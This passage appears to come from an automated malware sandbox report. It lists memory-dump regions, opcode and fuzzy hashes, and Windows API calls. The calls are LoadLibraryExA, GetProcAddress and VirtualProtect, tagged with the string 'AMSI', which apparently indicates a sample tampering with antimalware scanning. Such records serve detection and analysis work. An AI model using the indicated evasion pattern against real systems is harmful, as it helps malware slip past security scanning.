                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                        • Instruction ID: 2ee187d71a9059278338f5e9964dbdb784b6c1190840671df493890303f18d23
                                        • Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                        • Instruction Fuzzy Hash: 7EF106B5A01208EFDB48DF94C990AAEB7B5BF4C304F208598E906AB341D771EE45DF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2086369496.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                        • Instruction ID: 26ce9bbd6dbf5b8b3b22e34dfb98cbcc5a3e10a49f218210c8a4ea3402a97489
                                        • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                        • Instruction Fuzzy Hash: 3831A236A4474A8FC751EF18C48092AB7E4FF8D314F0609ADEA9587312D334FA4A8F91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LoadLibraryExA.KERNEL32(00204070,00000000,00000800), ref: 002025F9
                                        • GetProcAddress.KERNEL32(00000000,00204078), ref: 00202615
                                        • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 00202650
                                        • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 00202671
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2086413447.0000000000201000.00000020.00000001.sdmp, Offset: 00201000, based on PE: false
                                        Similarity
                                        • API ID: ProtectVirtual$AddressLibraryLoadProc
                                        • String ID: AMSI
                                        • API String ID: 3300690313-3828877684
                                        • Opcode ID: c2162c0c8bb9df89867a4d11149f210021c67b01d21cb54fa68e5b97ae3c247d
                                        • Instruction ID: 96bf0ca1a7b56f8ad4eb02987b0f76fd7b3aa6af1f7973df9119acedb9c5d1d4
                                        • Opcode Fuzzy Hash: c2162c0c8bb9df89867a4d11149f210021c67b01d21cb54fa68e5b97ae3c247d
                                        • Instruction Fuzzy Hash: EF113AB4E10309EFCB04CF94D849BAEBBB9FB48300F208149E60167381C3B16A54DF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 00202468
                                        • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 002024B2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2086413447.0000000000201000.00000020.00000001.sdmp, Offset: 00201000, based on PE: false
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID: @
                                        • API String ID: 544645111-2766056989
                                        • Opcode ID: ef0b4c833763edff444641968ad545fde574ca7954d7bd962033fd282d67352e
                                        • Instruction ID: b06337bde33b97d9ad17462a52278b0748e5ddba7598955989077c68b8a26dc9
                                        • Opcode Fuzzy Hash: ef0b4c833763edff444641968ad545fde574ca7954d7bd962033fd282d67352e
                                        • Instruction Fuzzy Hash: A0210EB0910209EFDF14CF94C988BAEBBB5FF44304F20819AD909A7282C774AF94DB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%